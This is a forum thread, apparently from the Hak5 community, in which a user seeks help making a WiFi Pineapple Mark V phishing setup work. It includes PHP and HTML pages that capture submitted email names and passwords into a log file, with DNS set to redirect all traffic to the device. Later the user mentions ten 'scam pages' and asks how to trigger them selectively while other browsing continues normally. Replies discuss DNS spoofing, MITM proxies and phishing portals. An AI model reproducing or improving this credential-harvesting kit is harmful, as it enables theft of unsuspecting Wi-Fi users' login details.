troter Posted December 25, 2014 Posted December 25, 2014 Merry xmass to all readers !!! After reading a lot of stuff about Mark V i finally got it but as all manuals related to mark IV im really stuck.. For example : http://hak5.org/hack/pineapple-phishing Can anyone explain what do i need to change to make it working on Mark V ? Thanks Quote
daniboy92 Posted December 25, 2014 Posted December 25, 2014 I think for this you need to use dnspoof. Quote
troter Posted December 25, 2014 Author Posted December 25, 2014 Yes Sure bro. Tnks What i whant to do is next : i want to create a index.html page with post asking for the mail and pass. after user will connect and enter details ill just use redirect to google. will it work ? Quote
troter Posted December 25, 2014 Author Posted December 25, 2014 Hi again ! After reading several manuals regarding using fish catching i didnt get any luck with it (maybe coz mark IV and V is different ?) My target is to redirect all incoming traffic to index.html anyone can advise what im doing wrong plz ? my setting is below : DNS 172.16.42.1 * Index.php <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html> redirect.php <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "*")){ header('Home'); header('Location: index.html'); } require('error.php'); ?> error.php <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("/tmp/pineapple-phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html> when client connects to pineapple he getting blank page.. if internet present client is able to use it Ps: Karma is running Firmware Version: 2.1.1 PHP Version 5.4.5 System Linux Pineapple 3.3.8 #21 Tue Dec 9 16:16:09 PST 2014 mips Build Date Oct 9 2014 16:09:31 Quote
troter Posted December 26, 2014 Author Posted December 26, 2014 PS: when the client connects to wifi pineapple and entering 172.16.42.1 magic happened.. in any another case i mean if i type google yahoo or whatever im just getting blank screen... any one can help ?? Quote
Guest Posted December 26, 2014 Posted December 26, 2014 You're waisting your time with DNSpoof. The spoof success rate is fairly low given most modern browsers cache the correct DNS entries. Quote
Sebkinne Posted December 26, 2014 Posted December 26, 2014 You're waisting your time with DNSpoof. The spoof success rate is fairly low given most modern browsers cache the correct DNS entries. This is true. We do however have a better alternative for this coming soon! Best regards, Sebkinne Quote
masler77 Posted December 26, 2014 Posted December 26, 2014 Seb, you might have a little spoiler what the future holds !? :-D Quote
DataHead Posted December 26, 2014 Posted December 26, 2014 He speaks of their secret mitm proxy Quote
troter Posted December 26, 2014 Author Posted December 26, 2014 (edited) Thanks 4 replays After i made some research i realised 2 week point 1) Can not set up automatic DNS spoof (dips pins etc don't have any decent description i mean set up manual) 2) Browsers.. is another story.. a) Safary 502 Bad Gateway (nginx /1.2.2) Strange thing is : after i join network from iphone for a second i saw half login screen.. saying captive.apple.com Tony is name of my network anyone can explain ?? captive.apple.com anyone can explain ??? b) Opera .. is good.. mobile opera same as standard version PS: Just read this article http://stackoverflow.com/questions/19682624/bypasses-apple-captive-network-assistant-login-in-ios-7 Edited December 26, 2014 by troter Quote
Guest Posted December 27, 2014 Posted December 27, 2014 This is true. We do however have a better alternative for this coming soon! Best regards, Sebkinne He speaks of their secret mitm proxy This? https://mitmproxy.org Looks fairly simply to configure. Quote
DrDinosaur Posted December 27, 2014 Posted December 27, 2014 This? https://mitmproxy.org Looks fairly simply to configure. See my thread on trying to install it. Quote
DataHead Posted December 27, 2014 Posted December 27, 2014 not that specificaly, but seb mentioned in a different thread that they are working on one of their own designed for the mk5! said hoped to have it out before the end of this year, good things to come :D and hopefully with the new sslstrip :D Quote
DataHead Posted December 27, 2014 Posted December 27, 2014 (edited) he mentions it in this post https://forums.hak5.org/index.php?/topic/34187-release-211-codename-pineosauria-mobilus/?p=254756 Happens to all of us ;) All the changes / additions we have made can be found in the changelog on the first page. In regards to a better dnsspoof, we are still working on our MITM proxy which will hopefully be released before the end of the year. Otherwise, we'll soon have a hangout where we will discuss future features. Best regards, Sebkinne Edited December 27, 2014 by datahead Quote
bytedeez Posted December 27, 2014 Posted December 27, 2014 (edited) i find evil portal to be great at phishing. Depending on how you setup your landing page of course. Edited December 27, 2014 by bytedeez Quote
johnjdoe Posted December 27, 2014 Posted December 27, 2014 This is perhaps a little bit OT, but yesterday I found the Lucy Phishing Server (http://phishing-server.com/). This could be a nice alternative if you want do some more specific phishing campaigns ... Quote
Guest Posted December 28, 2014 Posted December 28, 2014 i find evil portal to be great at phishing. Depending on how you setup your landing page of course. Correct me if im wrong, but the evil portal only realistically can produce a single phishing page being the landing page. Is this right? Quote
Guest Posted December 28, 2014 Posted December 28, 2014 See my thread on trying to install it. I would but i cannot view your topics under your profile..... Quote
troter Posted December 28, 2014 Author Posted December 28, 2014 I would but i cannot view your topics under your profile..... follow the white rabbit published posts Quote
Darren Kitchen Posted December 31, 2014 Posted December 31, 2014 Correct me if im wrong, but the evil portal only realistically can produce a single phishing page being the landing page. Is this right? Ish... Some php-fu should be able to determine the domain queried and forward on to an adequate landing page. I haven't tried it myself but knowing nodogsplash, the data required should be there somewhere. Quote
troter Posted December 31, 2014 Author Posted December 31, 2014 need some advice .. i got 10 scam pages.. a.html, b.htmlc.html....j.html redirection is set up.. is it possible to user to browse i-net as normal via internet sharing and triger only on my 10 pages ? currently i have dns set up to * Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.